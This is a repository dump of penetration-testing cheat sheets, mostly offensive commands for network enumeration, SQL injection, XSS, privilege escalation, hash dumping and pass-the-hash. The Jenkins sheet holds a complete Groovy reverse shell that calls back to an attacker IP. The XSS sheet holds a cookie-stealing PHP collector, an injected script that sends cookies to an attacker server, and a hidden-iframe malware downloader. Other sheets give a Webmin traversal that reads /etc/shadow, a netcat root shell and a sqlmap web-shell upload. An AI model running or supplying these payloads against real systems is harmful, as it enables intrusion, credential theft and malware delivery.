├── CheatSheets ├── 28533648.png ├── mysql │ └── readme.md ├── RCE │ └── README.md ├── LFI │ └── readme.md ├── shell │ └── readme.md ├── grep.md ├── encode │ └── readme.md ├── MSSQL │ └── readme.md ├── RPC │ └── readme.md ├── ssh │ └── readme.md ├── NFS │ └── readme.md ├── SMTP │ └── readme.md ├── pivoting │ └── readme.md ├── enum │ └── readme.md ├── windows │ ├── priv_esc │ │ ├── readme.md │ │ ├── Invoke-MS16-032.ps1 │ │ └── WinPrivCheck.bat │ ├── hashdump │ │ └── readme.md │ └── enumaration │ │ └── readme.md ├── pass_the_hash │ └── readme.md ├── RDP │ └── readme.md ├── SQLI │ ├── sqlmap │ │ └── readme.md │ └── barehands │ │ └── readme.md ├── netcat │ └── readme.md ├── webmin │ └── readme.md ├── linux │ ├── pos_xpl │ │ ├── readme.md │ │ └── LinEnum.sh │ └── priv_esc │ │ └── readme.md ├── jenkins │ └── readme.md ├── SNMP │ └── readme.md ├── nmap │ └── README.md ├── XSS │ └── readme.md ├── DNS │ └── readme.md └── NetBIOS │ └── readme.md ├── contribution.md └── README.md /CheatSheets/28533648.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lucthienphong1120/Pentest-Cheat-Sheets/HEAD/CheatSheets/28533648.png -------------------------------------------------------------------------------- /CheatSheets/mysql/readme.md: -------------------------------------------------------------------------------- 1 | # MYSQL 2 | 3 | ### Try default Root access 4 | 5 | `mysql -h Target_ip -u root` 6 | 7 | -------------------------------------------------------------------------------- /CheatSheets/RCE/README.md: -------------------------------------------------------------------------------- 1 | # WEB Remote Code Execution 2 | 3 | ## Simple PHP RCE 4 | `` 5 | 6 | -------------------------------------------------------------------------------- /CheatSheets/LFI/readme.md: -------------------------------------------------------------------------------- 1 | # LFI PHP 2 | 3 | ### Situation 4 | 5 | `http:///index.php?parameter=value` 6 | 7 | ### Test 8 | 9 | `http:///index.php?parameter=php://filter/convert.base64-encode/resource=index` 10 | 11 | ### Take a look at the bloody thing 12 | 13 | -------------------------------------------------------------------------------- /CheatSheets/shell/readme.md: -------------------------------------------------------------------------------- 1 | # Windows Shell 2 | 3 | ## pth-winexe 4 | 5 | ### With Pass 6 | 7 | pht-winexe -U % //Target_IP cmd 8 | 9 | `pth-winexe -U bob%alice //172.10.1.60 cmd` 10 | 11 | ### Pass The Hash 12 | 13 | `pth-winexe -U bob%hash //172.16.1.60 cmd` 14 | 15 | -------------------------------------------------------------------------------- /CheatSheets/grep.md: -------------------------------------------------------------------------------- 1 | #Taking Users to bruteforce 2 | 3 | ##smb 4 | 5 | Using enum4linux 6 | 7 | `./enum4linux.pl -U 192.168.1.113 | grep 'user:' | cut -d'[' -f2 | cut -d']' -f1 > Users` 8 | 9 | Using nmap *smb-enum-users.nse* 10 | 11 | `nmap 192.168.1.113 --script smb-enum-users.nse | grep "Full name:"` 12 | -------------------------------------------------------------------------------- /CheatSheets/encode/readme.md: -------------------------------------------------------------------------------- 1 | # Web encode to read PHP files 2 | 3 | ## Burpsuit encode Trick 4 | 5 | GET /?page='php://filter/convert.base64-encode/resource'= 6 | 7 | `GET /?page=php://filter/convert.base64-encode/resource=config` 8 | 9 | After this you can use decode from burpsuit or 'base64 -d' from linux terminal. 10 | -------------------------------------------------------------------------------- /CheatSheets/MSSQL/readme.md: -------------------------------------------------------------------------------- 1 | # MS SQL 2 | 3 | ### Nmap Information Gathering 4 | 5 | `nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip` -------------------------------------------------------------------------------- /CheatSheets/RPC/readme.md: -------------------------------------------------------------------------------- 1 | # RPC - Remote Procedure Call 2 | 3 | ### rpcclient 4 | 5 | Connect to an RPC share without a username and password and enumerate priviledges 6 | 7 | `rpcclient --user="" --command=enumprivs -N 172.20.10.5` 8 | 9 | Connect to an RPC share with a username and enumerate privledges 10 | 11 | `rpcclient --user="" --command=enumprivs 172.20.10.5` 12 | 13 | ### rpcinfo 14 | -------------------------------------------------------------------------------- /CheatSheets/ssh/readme.md: -------------------------------------------------------------------------------- 1 | # SSH 2 | 3 | ## Tunnels 4 | 5 | ### Simple ssh tunnel 6 | 7 | ssh -L :target: @tunnel_ip -p 8 | 9 | `ssh -L 3389:10.0.0.1:3389 user@192.168.101.11 -p 2222` 10 | 11 | ### Creating VPN tunnel through ssh to any subnet 12 | 13 | sshuttle -e "ssh <-i id_rsa_priv.key>" -r user@tunnel_ip & 14 | 15 | `sshuttle -e "ssh -i bob.key" -r bob@10.0.1.1 192.168.1.0/24 192.168.25.0/24 &` 16 | -------------------------------------------------------------------------------- /CheatSheets/NFS/readme.md: -------------------------------------------------------------------------------- 1 | # NFS - Network File System 2 | 3 | ### Nmap Show Mountable NFS Shares 4 | 5 | `nmap -sV --script=nfs-showmount 192.168.1.110` 6 | 7 | ### Show nfs 8 | 9 | showmount -e target_IP 10 | 11 | `showmout -e 192.168.1.110` 12 | 13 | ### Mount directory 14 | 15 | `mkdir /mnt/name_folder ` 16 | 17 | `mount -t nfs target_ip:/ /mnt/name_folder -o nolock` 18 | 19 | ### nfspy 20 | 21 | `sudo nfspy -o server=Target_IP:/home/Path,nfsport=2049/tcp,rw /tmp/path_to_Mount` 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /CheatSheets/SMTP/readme.md: -------------------------------------------------------------------------------- 1 | # SMTP 2 | 3 | ### netcat 4 | 5 | Enum Users 6 | 7 | `nc -vn target 25` 8 | 9 | `VRFY User_to_test` 10 | 11 | `VRFY root` 12 | answer = 252 2.0.0 root means That this user Exist here. 13 | 14 | `VRFY bla` 15 | answer = 550 5.1.1 means that bla doesn't exist here. 16 | 17 | ## Got users and Pass? 18 | 19 | ### Reading emails using Telnet 20 | 21 | telnet Ip_target port 22 | 23 | ``` 24 | $telnet 172.20.10.2 110 25 | USER username 26 | PASS password 27 | 28 | list 29 | 30 | retr 1 31 | 32 | ``` 33 | 34 | 35 | -------------------------------------------------------------------------------- /CheatSheets/pivoting/readme.md: -------------------------------------------------------------------------------- 1 | # Pivoting 2 | --- 3 | 4 | ## VPNPivot 5 | 6 | #### On attacker machine 7 | 8 | `$ sudo pivots -i -p -H -v` 9 | 10 | * __iface__ - is the virtual interface for the vpn itself, as example openvpn often creates tap0 or tun0, you can choose whaterver you want, like pwn0; 11 | * __mac__ - MAC address for the newly created device; 12 | * __port__ - whatever unused port you want 13 | 14 | 15 | #### On target machine 16 | 17 | `$ sudo pivotc ` 18 | -------------------------------------------------------------------------------- /CheatSheets/enum/readme.md: -------------------------------------------------------------------------------- 1 | # Web Enumeration 2 | 3 | ## Dirb 4 | 5 | Default wordlist 6 | 7 | `dirb http://target_site.com` 8 | 9 | Wordlist 10 | 11 | `dirb http://target_site.com /usr/share/wordlist/dirbuster/WORDLIST` 12 | 13 | Extensions 14 | 15 | `dirb http://target_site.com -X .php,.txt,.bak,.old` 16 | 17 | ## Gobuster 18 | 19 | `gobuster -w /usr/share/wordlists/dirb/common.txt -u TARGET` 20 | 21 | ## Nikto 22 | 23 | `nikto -h TARGET` 24 | 25 | `nikto -useproxy http://PROXY:3128 -h TARGET` 26 | 27 | ## UNISCAN 28 | 29 | `uniscan -qweds -u http://TARGET.com` 30 | 31 | -------------------------------------------------------------------------------- /CheatSheets/windows/priv_esc/readme.md: -------------------------------------------------------------------------------- 1 | # Windows Privilege Escalation 2 | 3 | ## Exploit ms16_032 4 | wget [Invoke-MS16-032.ps1](https://github.com/kitsun3sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/windows/priv_esc/Invoke-MS16-032.ps1) 5 | 6 | #### Upload it to the target and through the powershell command line execute: 7 | ```bash 8 | > powershell -ExecutionPolicy Bypass 9 | > Import-Module .\Invoke-MS16-032.ps1 10 | > Invoke-MS16-032 11 | ``` 12 | ##### Done, if everything worked fine, you're now system user. 13 | 14 | ## WinPrivCheck.bat 15 | 16 | ##### Upload it to the target and run through terminal 17 | 18 | ```cmd 19 | WinPrivCheck.bat 20 | ``` -------------------------------------------------------------------------------- /CheatSheets/pass_the_hash/readme.md: -------------------------------------------------------------------------------- 1 | # Pass the hash 2 | 3 | ## Smb pass the hash 4 | 5 | ### Tool: 6 | 7 | [pth-toolkit](https://github.com/byt3bl33d3r/pth-toolkit) 8 | 9 | 10 | #### Listing shared folders 11 | 12 | sudo pth-smbclient --user= --pw-nt-hash -m smb3 -L \\\\\\ 13 | 14 | `sudo pth-smbclient --user=user --pw-nt-hash -m smb3 -L 192.168.0.24 \\\\192.168.0.24\\ ljahdçjkhadkahdkjahsdlkjahsdlkhadklad` 15 | 16 | #### Interactive smb shell 17 | 18 | sudo pth-smbclient --user= --pw-nt-hash -m smb3 \\\\\\shared_folder 19 | 20 | `sudo pth-smbclient --user=user --pw-nt-hash -m smb3 \\\\192.168.0.24\\folder ljahdçjkhadkahdkjahsdlkjahsdlkhadklad` 21 | -------------------------------------------------------------------------------- /CheatSheets/RDP/readme.md: -------------------------------------------------------------------------------- 1 | # Remote Desktop Protocol 2 | 3 | ## xfreerdp 4 | ### Simple User Enumeration for Windows Target (kerberos based) 5 | 6 | xfreerdp /v: -sec-nla /u:"" 7 | 8 | `xfreerdp /v:192.168.0.32 -sec-nla /u:""` 9 | 10 | ## login 11 | 12 | xfreerdp /u: /g: /p: /v: 13 | 14 | `xfreerdp /u:administrator /g:grandbussiness /p:bla /v:192.168.1.34` 15 | 16 | ### Wordlist based bruteforce 17 | 18 | ### NCRACK 19 | 20 | ncrack -vv --user/-U --pass/-P :3389 21 | 22 | `ncrack -vv --user user -P wordlist.txt 192.168.0.32:3389` 23 | 24 | ### Crowbar 25 | 26 | crowbar -b rdp <-u/-U user/user_wordlist> -c/-C -s /32 -v 27 | 28 | `crowbar -b rdp -u user -C password_wordlist -s 192.168.0.16/32 -v` 29 | 30 | -------------------------------------------------------------------------------- /CheatSheets/windows/hashdump/readme.md: -------------------------------------------------------------------------------- 1 | # Windows HashDump without metasploit 2 | 3 | ## Windows Passwords 4 | 5 | ### Reg Commands to get passwords' file 6 | 7 | System file 8 | 9 | `reg save HKLM\System system.hive` 10 | 11 | SAM File 12 | 13 | `reg save HKLM\SAM sam.hive` 14 | 15 | 16 | ### HASHDUMP 17 | 18 | `samdump2 system.hive sam.hive` 19 | 20 | 21 | #### Windows Repair 22 | 23 | Backup files < Windows 2003 24 | 25 | `c:\windows\repair` 26 | 27 | Donwload sam and system. 28 | 29 | `bkhive system key.txt` 30 | `samdump2 sam key.txt` 31 | 32 | 33 | ### FGDump 34 | 35 | Kali Path: /usr/share/windows-binaries/fgdump/fgdump.exe 36 | 37 | 38 | ### WCE 39 | 40 | Kali Paths: 41 | * /usr/share/wce/wce32.exe 42 | * /usr/share/wce/wce64.exe 43 | * /usr/share/wce/wce-universal.exe 44 | 45 | Get pass 46 | 47 | `wce-universal.exe ` 48 | 49 | Try to get pass into clear text 50 | 51 | `wce-universal.exe -w` 52 | 53 | 54 | 55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /contribution.md: -------------------------------------------------------------------------------- 1 | # Contribution 2 | 3 | ## Tricks 4 | 5 | 1. Create a [GitHub](https://github.com) account. 6 | 2. Fork [Pentest-Cheat-Sheets](https://github.com/kitsun3sec/Pentest-Cheat-Sheets). 7 | 3. Clone GitHub forked Pentest-Cheat-Sheets repository: 8 | `git clone https://github.com/[YourGithubAccount]/Pentest-Cheat-Sheets` 9 | 4. Create a new branch: 10 | `git branch -m branchname` 11 | 5. Add your code. 12 | 6. Add your code to stage are 13 | `git add --all` 14 | 7. Commit 15 | ` git commit -m "description of your trick"` 16 | 8. Push 17 | `git push -u origin branchname` 18 | 19 | ## Adding new Trick 20 | 21 | 1. You need to create a folder into **CheatSheets** . 22 | Example: `mkdir nmap` 23 | 2. Create a **readme.md** into this folder. 24 | `CheatSheets/* has many examples` 25 | 3. Add your NINJA tricks. 26 | 27 | ## Modifying one 28 | 29 | 1. Open the file using your favorite text editor 30 | `vim CheatSheets/ssh/readme.md` 31 | 2. Make your changes and send to us 32 | 33 | 34 | #### We really <3 You! 35 | -------------------------------------------------------------------------------- /CheatSheets/SQLI/sqlmap/readme.md: -------------------------------------------------------------------------------- 1 | # SQLI tricks 2 | 3 | ## GET 4 | 5 | ### Error-Based 6 | 7 | ### Simple test 8 | 9 | `Adding a simpe quote '` 10 | 11 | Example: `http://192.168.1.104/Less-1/?id=5'` 12 | 13 | ### Checking Privileges 14 | 15 | Using Sql-map 16 | 17 | `./sqlmap.py -u http://localhost/Less-1/?id=1 --privileges | grep FILE` 18 | 19 | ### Reading file 20 | 21 | `./sqlmap.py -u --file-read=` 22 | 23 | `./sqlmap.py -u http://localhost/Less-1/?id=1 --file-read=/etc/passwd` 24 | 25 | ### Writing file 26 | 27 | `./sqlmap.py -u --file-write= --file-dest=` 28 | 29 | `./sqlmap.py -u http://localhost/Less-1/?id=1 --file-write=shell.php --file-dest=/var/www/html/shell-php.php` 30 | 31 | ## POST 32 | 33 | `./sqlmap.py -u --data=" "` 34 | 35 | `./sqlmap.py -u http://localhost/Less-11/ --data "uname=teste&passwd=&submit=Submit" -p uname` 36 | 37 | You can also use a file like with the post request: 38 | 39 | 40 | `./sqlmap.py -r post-request.txt -p uname` 41 | 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /CheatSheets/netcat/readme.md: -------------------------------------------------------------------------------- 1 | # Netcat 2 | 3 | ## Port Scanner 4 | 5 | One port 6 | `nc -vnz ` 7 | 8 | `nc -nvz 192.168.1.23 80` 9 | 10 | Port Range 11 | `nc -vnz 192.168.1.23 0-1000` 12 | 13 | ## Send files 14 | 15 | * Server 16 | 17 | `nc -lvp 1234 > file` 18 | 19 | * Client 20 | 21 | `nc -vn < File_to_send` 22 | 23 | `nc -vn 192.168.1.33 1234 < file_to_send` 24 | 25 | ## Executing remote script 26 | 27 | * Server 28 | 29 | `nc -lvp 1234 -e ping.sh ` 30 | 31 | * Client 32 | 33 | `nc -vn 192.168.1.33 1234` 34 | 35 | 36 | ## Chat with encryption 37 | 38 | * Server 39 | `ncat -nlvp 8000 --ssl` 40 | 41 | * Client 42 | `ncat -nv 192.168.1.33 8000` 43 | 44 | ## Banner Grabbing 45 | 46 | ``` 47 | nc target port 48 | HTTP_Verb path http/version 49 | Host: url 50 | ``` 51 | 52 | ``` 53 | nc www.bla.com.br 80 54 | HEAD / HTTP/1.0 55 | Host: www.bla.com.br 56 | ``` 57 | 58 | ##### If this site uses https you need to use openssl 59 | 60 | Example: 61 | 62 | `Openssl s_client -quiet www.bla.com.br:443` 63 | 64 | 65 | -------------------------------------------------------------------------------- /CheatSheets/webmin/readme.md: -------------------------------------------------------------------------------- 1 | # Webmin 2 | 3 | `export ip=172.20.10.5` 4 | 5 | ### Test for LFI & file disclosure vulnerability by grabbing /etc/passwd 6 | 7 | Some servers can change root path, just change the URL path... 8 | 9 | `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd` 10 | 11 | ### Test to see if webmin is running as root by grabbing /etc/shadow 12 | 13 | `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow` 14 | 15 | 16 | ## You can use John to break it 17 | 18 | unshadow passwd shadow > Hash 19 | 20 | ### Resources 21 | * [CVE: CVE-2006-3392](https://www.exploit-db.com/exploits/2017/) -------------------------------------------------------------------------------- /CheatSheets/windows/enumaration/readme.md: -------------------------------------------------------------------------------- 1 | # Windows OS Enumaration 2 | 3 | ## System Information 4 | 5 | `systeminfo` 6 | 7 | `systeminfo | findstr /B /C:"OS Name" /C:"OS Version"` 8 | 9 | ## users 10 | 11 | `net users` 12 | 13 | ## Info about a user 14 | 15 | `net user USER` 16 | 17 | Change USER PASSWORD 18 | 19 | `net user USER NEW_PASSWORD` 20 | 21 | add User 22 | 23 | net users USER /add 24 | 25 | ## Adding a user into a group 26 | 27 | `net group Administrators USER /add` 28 | 29 | `net localgroup Administrators USER /add` 30 | 31 | `net group "Remote Desktop User" USER /add` 32 | 33 | ## groups 34 | 35 | `net groups` 36 | 37 | `net localgroups` 38 | 39 | ## Whoami 40 | 41 | `whoami` 42 | 43 | `whoami /all` 44 | 45 | ## Network info 46 | 47 | IP / Interfaces 48 | 49 | `ipconfig /all` 50 | 51 | Routes 52 | 53 | `route print` 54 | 55 | ARP table 56 | 57 | `arp -A` 58 | 59 | ## List process 60 | 61 | `tasklist` 62 | 63 | ## Query current drives on system 64 | 65 | `fsutil fsinfo drives` 66 | 67 | 68 | ## RDP 69 | 70 | list users that can use RDP 71 | 72 | `qwinsta` 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /CheatSheets/linux/pos_xpl/readme.md: -------------------------------------------------------------------------------- 1 | # Post-Exploitation on Linux 2 | 3 | ## Data Haversting and Enumaration 4 | 5 | ### Common users 6 | 7 | `awk -F: '{ if($3 >= 1000) print $1}' passwd >> users` 8 | 9 | ### Reading bash_history files 10 | 11 | Mapping users directories 12 | 13 | `ls /home/ > users_home` 14 | 15 | Reading files 16 | 17 | `for user in $(cat home_users); do echo $user; cat /home/$user/.bash_history ; echo -e "=====\n" ;done` 18 | 19 | ### Using great scripts 20 | 21 | LinEnu.sh 22 | 23 | wget [LinEnum.sh](https://raw.githubusercontent.com/kitsun3sec/Pentest-Cheat-Sheets/master/CheatSheets/pos_xpl/LinEnum.sh) 24 | 25 | #### Upload it to the target and run through terminal 26 | 27 | ```bash 28 | > chmod +x LinEnum.sh 29 | > ./LinEnum.sh -t 30 | ``` 31 | 32 | #### Done, now pay attention to the output and see if there is anything *interesting* 33 | 34 | 35 | ## OTHERS SCRIPTS 36 | 37 | * [LinuxPrivChecker](https://www.securitysift.com/download/linuxprivchecker.py) 38 | * [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester) 39 | * [High Coffee](https://highon.coffee/downloads/linux-local-enum.sh) -------------------------------------------------------------------------------- /CheatSheets/jenkins/readme.md: -------------------------------------------------------------------------------- 1 | # Jenkins 2 | 3 | ## Reverse Shell via Jenkins 4 | 5 | Go to Jenkins script console: 6 | 7 | `https://target-jenkins/script` 8 | 9 | Execute the following `Groovy` script to send you the reverse shell on port 8080: 10 | ``` 11 | String host="ATTACKERS-IP-HERE"; 12 | int port=8080; 13 | String cmd="/bin/bash"; 14 | Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); 15 | ``` 16 | 17 | > Don't forget setting you listener before run the script 18 | 19 | ## Decoding a Jenkins encripted password 20 | 21 | Go to Jenkins script console: 22 | 23 | `https://target-jenkins/script` 24 | 25 | Execute the following `Groovy` script to decode the encripted information 26 | 27 | ``` 28 | hashed_pw='{ENC_PASS_HERE}' 29 | passwd = hudson.util.Secret.decrypt(hashed_pw) 30 | println(passwd) 31 | ``` 32 | -------------------------------------------------------------------------------- /CheatSheets/SNMP/readme.md: -------------------------------------------------------------------------------- 1 | # SNMP 2 | 3 | ### Fixing SNMP output 4 | 5 | `apt-get install snmp-mibs-downloader download-mibs` 6 | 7 | `echo "" > /etc/snmp/snmp.conf` 8 | 9 | ### OneSixtyone 10 | 11 | onesixtyone -c COMMUNITY -i Target_ip 12 | 13 | `onesixtyone -c community.txt -i Found_ips.txt` 14 | 15 | ### snmpwalk 16 | 17 | Walking MIB's 18 | 19 | snmpwalk -c COMMUNITY -v VERSION target_ip 20 | 21 | `snmpwalk -c public -v1 192.168.25.77` 22 | 23 | specific MIB node 24 | snmpwalk -c community -v version Target IP MIB Node 25 | Example: USER ACCOUNTS = 1.3.6.1.4.1.77.1.2.25 26 | 27 | `snmpwalk -c public -v1 192.168..25.77 1.3.6.1.4.1.77.1.2.25` 28 | 29 | ### snmp-check 30 | 31 | snmp-check -t target_IP | snmp-check -t TARGET -c COMMUNITY 32 | 33 | `snmp-check -t 172.20.10.5` 34 | 35 | `snmp-check -t 172.20.10.5 -c public` 36 | 37 | ### Automate the username enumeration process for SNMPv3 38 | 39 | `apt-get install snmp snmp-mibs-downloader` 40 | 41 | `wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb` 42 | 43 | ### NMAP SNMPv3 Enumeration 44 | 45 | `nmap -sV -p 161 --script=snmp-info 172.20.10.0/24` 46 | 47 | 48 | ### Default Credentials 49 | 50 | /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 51 | 52 | 53 | 54 | 55 | -------------------------------------------------------------------------------- /CheatSheets/nmap/README.md: -------------------------------------------------------------------------------- 1 | # NMAP CHEAT SHEETS 2 | 3 | Set the ip address as a varible 4 | `export ip=192.168.1.100` 5 | `export netw=192.168.1.0/24` 6 | 7 | ### Detecting Live Hosts 8 | Only Ip's 9 | 10 | `nmap -sn -n $netw | grep for | cut -d" " -f5` 11 | 12 | ### Stealth Scan 13 | 14 | `nmap -sS $ip` 15 | 16 | Only Open Ports and Banner Grab 17 | 18 | `nmap -n -Pn -sS $ip --open -sV` 19 | 20 | Stealth scan using FIN Scan 21 | 22 | `nmap -sF $ip` 23 | 24 | ### Agressive scan 25 | 26 | Without Ping scan, no dns resolution, show only open ports all and test All TCP Ports 27 | 28 | `nmap -n -Pn -sS -A $ip --open -p-` 29 | 30 | Nmap verbose scan, runs syn stealth, T4 timing, OS and service version info, traceroute and scripts against services 31 | 32 | `nmap –v –sS –A –T4 $ip` 33 | 34 | ### OS FigerPrint 35 | 36 | `nmap -O $ip` 37 | 38 | ### Quick Scan 39 | 40 | `nmap -T4 -F $netw` 41 | 42 | ### Quick Scan Plus 43 | 44 | `nmap -sV -T4 -O -F --version-light $netw` 45 | 46 | ### output to a file 47 | 48 | `nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip` 49 | 50 | ### output to a file Plus 51 | 52 | `nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 $netw` 53 | 54 | ### Search NMAP scripts 55 | 56 | `ls /usr/share/nmap/scripts/ | grep ftp` 57 | 58 | * [Nmap Discovery](https://nmap.org/nsedoc/categories/discovery.html) 59 | -------------------------------------------------------------------------------- /CheatSheets/linux/priv_esc/readme.md: -------------------------------------------------------------------------------- 1 | 2 | # Privillege Escalation 3 | 4 | ### ry the obvious - Maybe the user can sudo to root: 5 | 6 | `sudo su` 7 | 8 | ### List all SUID files 9 | 10 | `find / -perm -4000 2>/dev/null` 11 | 12 | `find / -user root -perm -4000 -print 2>/dev/null` 13 | 14 | `find / -perm -u=s -type f 2>/dev/null` 15 | 16 | `find / -user root -perm -4000 -exec ls -ldb {} \;` 17 | 18 | Nmap version [2.02 - 5.21] 19 | 20 | `nmap -V` 21 | 22 | `nmap --interactive` 23 | 24 | `nmap> !sh` 25 | 26 | 27 | ### Performing privilege escalation by misconfigured SUID 28 | 29 | #### Find 30 | 31 | `touch kitsun3sec` && `find kitsun3sec -exec whoami \;` 32 | 33 | if root 34 | 35 | `find kitsun3sec -exec netcat -lvp 5555 -e /bin/sh \;` 36 | 37 | #### vim.tiny 38 | 39 | ` vim.tiny /etc/shadow ` 40 | 41 | ``` 42 | vim.tiny 43 | # Press ESC key 44 | :set shell=/bin/sh 45 | :shell 46 | ``` 47 | 48 | #### Bash 49 | 50 | `bash -p` 51 | 52 | `whoami` 53 | 54 | #### Less 55 | 56 | ``` 57 | less /etc/passwd 58 | !/bin/sh 59 | ``` 60 | 61 | ### Listing process 62 | 63 | `ps aux` 64 | 65 | `ps xaf` 66 | 67 | ### Determine the current version of Linux 68 | 69 | `cat /etc/issue` 70 | 71 | `lsb_release -a` 72 | 73 | ### Determine more information about the environment 74 | 75 | `uname -a` 76 | 77 | ## Searchsploit 78 | 79 | `searchsploit linux 2.6` 80 | 81 | `searchsploit centos 6` -------------------------------------------------------------------------------- /CheatSheets/XSS/readme.md: -------------------------------------------------------------------------------- 1 | # XSS tricks 2 | 3 | ## Reflected 4 | 5 | ### Simple test 6 | This is a simple test to see what happens, this is not a prove that the field is vuln to xss 7 | 8 | `` 9 | 10 | ### Simple XSS test 11 | 12 | `<script>alert('Found')</script>` 13 | 14 | `"><script>alert(Found)</script>">` 15 | 16 | `<script>alert(String.fromCharCode(88,83,83))</script>` 17 | 18 | ### Bypass filter of tag script 19 | 20 | `" onload="alert(String.fromCharCode(88,83,83))` 21 | 22 | `" onload="alert('XSS')` 23 | 24 | bla is not a valid image, so this cause an error 25 | 26 | `<img src='bla' onerror=alert("XSS")>` 27 | 28 | ## Persistent 29 | 30 | `>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>HACKED!</h1></div>";` 31 | 32 | 33 | ### PHP collector 34 | 35 | `> cookie.txt` 36 | `chmod 777 cookie.txt` 37 | 38 | edit a php page like colector.php as follow: 39 | 40 | ```php 41 | <?php 42 | $cookie=GET['cookie']; 43 | $useragent=$_SERVER['HTTP_USER_AGENT']; 44 | $file=fopen('cookie.txt', 'a'); 45 | fwrite($file,"USER AGENT:$useragent || COOKIE=$cookie\n"); 46 | fclose($file); 47 | ?> 48 | ``` 49 | 50 | Script to put in page: 51 | 52 | `<scritp>new Image().src="http://OUR_SERVER_IP/colector.php?cookie="+document.cookie;</script>` 53 | 54 | ### Malware Donwloader via XSS 55 | 56 | <iframe src="http://OUR_SERVER_IP/OUR_MALWARE" height="0" width="0"></iframe> 57 | -------------------------------------------------------------------------------- /CheatSheets/DNS/readme.md: -------------------------------------------------------------------------------- 1 | # DNS Enumaration 2 | 3 | ## Nslookup 4 | 5 | Resolve a given hostname to the corresponding IP. 6 | 7 | `nslookup targetorganization.com` 8 | 9 | ## Reverse DNS lookup 10 | 11 | `nslookup -type=PTR IP_address` 12 | 13 | ## MX(Mail Exchange) lookup 14 | 15 | `nslookup -type=MX domain` 16 | 17 | ## Zone Transfer 18 | 19 | ### Using nslookup Command 20 | 21 | `nslookup` 22 | `server domain.com` 23 | `ls -d domain.com` 24 | 25 | ### Using HOST Command 26 | 27 | host -t ns(Name Server) < domain > 28 | 29 | `host -t ns domain.com` 30 | 31 | after that test nameservers 32 | 33 | host -l < domain > < nameserver > 34 | 35 | `host -l domain.com ns2.domain.com` 36 | 37 | ### Nmap Dns Enumaration 38 | 39 | `nmap -F --dns-server <dns server ip> <target ip range>` 40 | 41 | ## Auto tools 42 | 43 | ### DNSenum 44 | 45 | `dnsenum targetdomain.com` 46 | 47 | `dnsenum --target_domain_subs.txt -v -f dns.txt -u a -r targetdomain.com` 48 | 49 | ### DNSmap 50 | 51 | `dnsmap targetdomain.com` 52 | 53 | `dnsmap targetdomain.com -w <Wordlst file.txt>` 54 | 55 | Brute Force, the file is saved in /tmp 56 | 57 | `dnsmap targetdomain.com -r` 58 | 59 | ### DNSRecon DNS Brute Force 60 | 61 | `dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml` 62 | 63 | ### Fierce.pl 64 | 65 | `fierce -dns targetdomain.com` 66 | 67 | ### HostMap 68 | 69 | `hostmap.rb -only-passive -t <IP>` 70 | 71 | We can use -with-zonetransfer or -bruteforce-level 72 | 73 | ### Online Tools 74 | 75 | * https://dnsdumpster.com/ 76 | * https://network-tools.com/nslook/ 77 | * https://www.dnsqueries.com/en/ 78 | * https://mxtoolbox.com/ -------------------------------------------------------------------------------- /CheatSheets/NetBIOS/readme.md: -------------------------------------------------------------------------------- 1 | # NetBIOS Recon & Enumaration 2 | 3 | ## Using WINDOWS Tools 4 | 5 | ### nbtstat 6 | 7 | #### How to see the status of a server 8 | 9 | `nbtstat -a <Target_ip>` 10 | 11 | `nbtstat -a 10.10.1.100` 12 | 13 | #### Whats is available there 14 | 15 | `net view Target_IP` 16 | 17 | `net view 10.10.1.100` 18 | 19 | #### Explore it 20 | 21 | net use < A_drive > \\Target_IP\SHARE_NAME 22 | 23 | `net use K: \\10.10.1.100\Dados` 24 | 25 | ### nat 26 | 27 | nat < -o output file > < -u userlist.txt > < -p passlist.txt> < IP_Address/RANGE > 28 | 29 | `nat -o netbios_output.txt -u usernames.txt -p rockyou.txt 10.10.1.100` 30 | 31 | ### winfo 32 | 33 | #### NUll Session 34 | 35 | `winfo < IP_Address > (-v verbose) (-n Null Session)` 36 | 37 | #### Enumarate 38 | 39 | `winfo < IP_Address> -u` 40 | 41 | ## Using UNIX Tools 42 | 43 | ### nbtscan 44 | 45 | `nbtscan -r 172.16.1.0/24` 46 | 47 | ### smblcient 48 | 49 | NUll Session 50 | 51 | `smbclient -L //172.168.1.5 -N` 52 | 53 | No Password but with User 54 | 55 | `smbclient -L //172.168.1.5 -N -U Administrator` 56 | 57 | `smbclient //172.168.1.5/path -N` 58 | 59 | `smbclient //172.168.1.5/path -U DOMAIN\\administrator` 60 